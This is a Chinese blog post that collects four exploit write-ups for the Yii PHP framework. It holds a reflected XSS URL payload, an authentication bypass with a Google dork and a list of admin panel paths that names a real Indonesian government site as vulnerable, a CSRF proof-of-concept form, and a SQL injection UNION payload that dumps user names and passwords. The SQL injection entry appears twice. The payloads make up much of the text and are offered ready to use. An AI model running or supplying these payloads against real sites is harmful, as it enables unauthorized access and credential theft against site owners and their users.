Yii Framework 漏洞整理

时间:2020-03-26
本文章向大家介绍Yii Framework 漏洞整理,主要包括Yii Framework 漏洞整理使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

一 Yii Framework 2.0.9 - Cross Site ScriptingPublished

# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting 
# Discovery Date: 2019-02-12 
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9 
# CVE : 2018-6010


In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.


Example:


http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E

  

二 Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability

#################################################################################################

# Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/07/2018
# Vendor Homepage : yiiframework.com
# Tested On : Windows
# Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~ 
github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin
+ yiiframework.com/extension/rbac-manager  ~ yiiframework.com/extension/yii2-admin ~
+  travis-ci.org/mdmsoft/yii2-admin  ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master
+ codeclimate.com/github/mdmsoft/yii2-admin
# Category : WebApps
# Versions : 2.x and 3.x
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ]

#################################################################################################

# Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability

Yii Framework yii2-admin RBAC Manager for Yii 2

GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user 

Features of the Product [ Software ]

Manage RBAC System in intuitive Tree-View
Ceep cool with rekursion protection in RBAC Tree
Generate PHP Code
Full relational move, create, edit, delete support of RBAC Tree items.
Assign and eject multiple Roles to and from multiple Users
Create predefined buisness Rules for User Assignments
Assign Roles in Secure Mode
By Controller protected and not changeable Roles and Assignments
Use easy checkAccess() methods in your Controller
Create easy bizRule Code in your RBAC Roles and Assignments

################################################################################################

# Description for Improper Authentication Vulnerability [ CWE-287 ]

+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

+ If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering 
(e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges 
within the application or disclose sensitive information.

+ If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page:

+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.

+ Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration.

+ The attacker might be able to gain unauthorized access to the application and otherwise 
restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code.

+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.

Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]

#################################################################################################

# Google Dork  : inurl:''/emusrenbang/web/index.php?r=''

# Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin

# Exploit : No Username. No Password. No Need for Login Credentials. Web don't need login. 

Just enter this link after URL Link.

/emusrenbang/web/index.php?r=admin

Whatever you give an exploit like [ anything' OR 'x'='x ]  or [  '=''or' ] and many others as SQL Authentication Bypass. 

It always says that '' Incorrect username or password. '' But we will jump over the admindoor wall. 

This is called as Improper Authentication Vulnerability.

127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] =>  archive.is/BLaE5

127.0.0.1/emusrenbang/web/index.php?r=admin  => [ Proof of Concept ] => archive.is/D9dKP

Useable Admin Control Panel URL Links => 

/emusrenbang/web/index.php?r=admin
/emusrenbang/web/index.php?r=admin%2Fassignment
/emusrenbang/web/index.php?r=admin%2Frole
/emusrenbang/web/index.php?r=admin%2Fpermission
/emusrenbang/web/index.php?r=admin%2Froute
/emusrenbang/web/index.php?r=admin%2Frule
/emusrenbang/web/index.php?r=admin%2Fmenu
/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex

#################################################################################################

Indonesia Government Site [ Bappeda Provinsi Sumatera Utara 2016  ] is only vulnerable website.

# Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu 

# [ Proof of Concept ] => archive.is/lCRem

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

  

三 Yii Framework Blog Cross Site Request Forgery

# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category:: web
# Tested on: Windows 8

Attacker will be able to create a post.

<html>

  <body>
    <form action="
http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
      <input type="hidden" name="Post[title]" value="test" />
      <input type="hidden" name="Post[content]" value="test" />
      <input type="hidden" name="Post[tags]" value="test" />
      <input type="hidden" name="Post[status]" value="2" />
      <input type="hidden" name="yt0" value="Create" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

  

四 Yii Framework Search SQL Injection Vulnerability

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
####
Vulnerability:
##################################
 
SQL Injection via search form. You can query to get some info about
administrator account and something...
 
##################################
Exploitation:
##################################
 
' UNION SELECT
1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fRom user-- -
 
##################################
More Details:
##################################
 
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html
 

##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################

  

# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
####
Vulnerability:
##################################
 
SQL Injection via search form. You can query to get some info about
administrator account and something...
 
##################################
Exploitation:
##################################
 
' UNION SELECT
1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fRom user-- -
 
##################################
More Details:
##################################
 
Website: http://junookyo.blogspot.com/
About Exploit:
http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html
 

##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################

原文地址:https://www.cnblogs.com/junsec/p/12574932.html